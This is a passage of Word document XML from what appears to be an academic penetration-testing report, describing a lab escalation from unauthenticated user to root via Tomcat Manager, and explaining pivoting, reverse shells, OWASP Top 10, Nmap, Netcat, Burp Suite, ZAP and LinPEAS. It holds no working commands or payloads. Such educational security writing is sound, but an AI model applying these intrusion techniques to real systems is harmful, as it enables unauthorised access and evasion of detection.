      <w:r w:rsidR="006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="51" w:name="Paragraph21"/>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"resource21"</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006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[21]</w:t>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="43E36640" w14:textId="637FC760" w:rsidR="00712E47" w:rsidRPr="00D77DFE" w:rsidRDefault="00D67B8A" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>project demonstrates a full privilege escalation scenario, starting from an unauthenticated user and progressing to root access on the machine 10.0.2.178:  Unauthenticated user → Tomcat Manager admin → user redlowo → user stocznia → user sopot → root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB4EFD" w14:textId="75A047D8" w:rsidR="004A2AB1" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4B69" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next, </w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network pivoting is an attack technique that involves leveraging a compromised machine to gain access to another machine within a different network. The compromised system acts as a bridge between the tester or attacker and the target machine.</w:t>
      </w:r>
      <w:r w:rsidR="006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="52" w:name="paragraph22"/>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource22"</w:instrText>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[22]</w:t>
      </w:r>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">For example, a tester gains initial access to a machine in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ubnet 1, then uses it to access a machine in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ubnet 3, scans for additional hosts, discovers a machine in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ubnet 4, and finally gains access to the machine in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ubnet 4 through the compromised machine in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>ubnet 3.</w:t>
      </w:r>
      <w:r w:rsidR="00E75531" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">In real-world scenarios, this attack is particularly dangerous because incident response logs may indicate that the attack originated from the machine in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>ubnet 3, rather than from the original attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A7A8F" w14:textId="033B2EFC" w:rsidR="00595DCC" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4B69" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, </w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>OWASP Top 10 is a project that provides a checklist of the most common and critical web application vulnerabilities for penetration testers and security engineers to assess whether a system is affected by any of these issues. It is released approximately every three years and is widely used for vulnerability identification, risk mitigation, and security training.</w:t>
      </w:r>
      <w:r w:rsidR="006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="53" w:name="paragraph23"/>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"resource23"</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006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[23]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D773924" w14:textId="42D345B2" w:rsidR="002065C7" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4B69" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, </w:t>
      </w:r>
      <w:r w:rsidR="002065C7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell is a piece of code or script used to gain initial access to another machine by taking advantage of a vulnerability, misconfiguration, or the ability to upload </w:t>
      </w:r>
      <w:r w:rsidR="002065C7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and execute a file on the target system. It is considered a payload, as it is code with malicious intent designed to provide remote access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B8A9F9" w14:textId="2D9ED901" w:rsidR="00AE0FF7" w:rsidRPr="00D77DFE" w:rsidRDefault="00AE0FF7" w:rsidP="00A003DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc223521100"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tools in Penetration Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39769F6A" w14:textId="100C3D15" w:rsidR="00A67175" w:rsidRPr="00D77DFE" w:rsidRDefault="00A67175" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Nmap is an open-source tool mainly used for reconnaissance and scanning. It is used for host discovery to identify which hosts are active within a network range and for port scanning to determine which ports are open on a specific host. Nmap can also detect service versions running on open ports and identify the operating system used on a target machine. Additionally, it provides features for vulnerability scanning of specific service versions through scripting.</w:t>
      </w:r>
      <w:r w:rsidR="006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="55" w:name="paragraph24"/>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"resource24"</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006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[24]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5437FA" w14:textId="32E18691" w:rsidR="00C06FC5" w:rsidRPr="00D77DFE" w:rsidRDefault="00C06FC5" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Netcat is a network utility used for reading from and writing to network connections. In the context of penetration testing, it is commonly used for port scanning, banner grabbing, file transfers, and creating reverse shells. In this project simulation, Netcat is used as a listener on the Kali machine to receive a reverse connection from the compromised vulnerable machine.</w:t>
      </w:r>
      <w:r w:rsidR="006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="56" w:name="paragraph25"/>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"resource25"</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006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[25]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1F8AD2" w14:textId="2F67AC16" w:rsidR="00C06FC5" w:rsidRPr="00D77DFE" w:rsidRDefault="00C06FC5" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Burp Suite is a platform used for web application testing. In the context of penetration testing, it is used to manipulate requests and validate responses. It includes various tools and features, such as</w:t>
      </w:r>
      <w:r w:rsidR="004A2C95" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="resource26" w:history="1">
        <w:r w:rsidR="004A2C95" w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>[26]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6481642A" w14:textId="77777777" w:rsidR="00024908" w:rsidRDefault="00C06FC5" w:rsidP="00024908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024908">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Proxy, which sits between the browser and the web application to intercept and modify requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CC24D7" w14:textId="77777777" w:rsidR="00024908" w:rsidRDefault="00C06FC5" w:rsidP="00024908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024908">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Scanner, which uses automated scripts to identify vulnerabilities based on the responses received from the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FDAB8E" w14:textId="65A840D5" w:rsidR="00C06FC5" w:rsidRPr="00024908" w:rsidRDefault="00C06FC5" w:rsidP="00024908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024908">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Intruder, which allows testers or attackers to perform attacks such as fuzzing or brute forcing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7000EF77" w14:textId="7E779855" w:rsidR="006811F2" w:rsidRPr="00D77DFE" w:rsidRDefault="00C06FC5" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Additional tools like Repeater, Sequencer, Comparer, and support for extensions (BApps) to extend functionality.</w:t>
      </w:r>
      <w:r w:rsidR="006811F2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469028FE" w14:textId="5D702F77" w:rsidR="00581EDC" w:rsidRPr="00D77DFE" w:rsidRDefault="00581EDC" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ZAP Proxy is an open-source web application testing tool. Its most important feature is the proxy, which acts as a man-in-the-middle between the browser and the web application. It can capture requests and allows the tester to manipulate them before sending them to the web application. ZAP also provides features similar to Burp Suite, such as automated scanning, a spider for discovering hidden endpoints and directories (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>fuzzing), and the ZAP Marketplace, which allows users to add and install plugins to extend ZAP’s functionality.</w:t>
      </w:r>
      <w:bookmarkStart w:id="57" w:name="paragraph27"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="resource27" w:history="1">
        <w:r w:rsidR="00D401CC" w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>[27]</w:t>
        </w:r>
        <w:bookmarkEnd w:id="57"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="385F9012" w14:textId="232F38A5" w:rsidR="00581EDC" w:rsidRPr="00D77DFE" w:rsidRDefault="00581EDC" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>LinPEAS (Linux Privilege Escalation Awesome Script) is a script that contains many automated checks for scanning Linux systems for vulnerabilities, outdated packages, misconfigurations, and hidden files that attackers may use to escalate privileges after gaining initial access. It also supports stealthy operation, allowing it to run from memory without writing files to disk, which helps reduce detection.</w:t>
      </w:r>
      <w:r w:rsidR="00AE0FF7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="58" w:name="paragraph28"/>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"resource28"</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00D401CC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[28]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidR="00E715EE" w:rsidRPr="00D77DFE">
        <w:rPr>
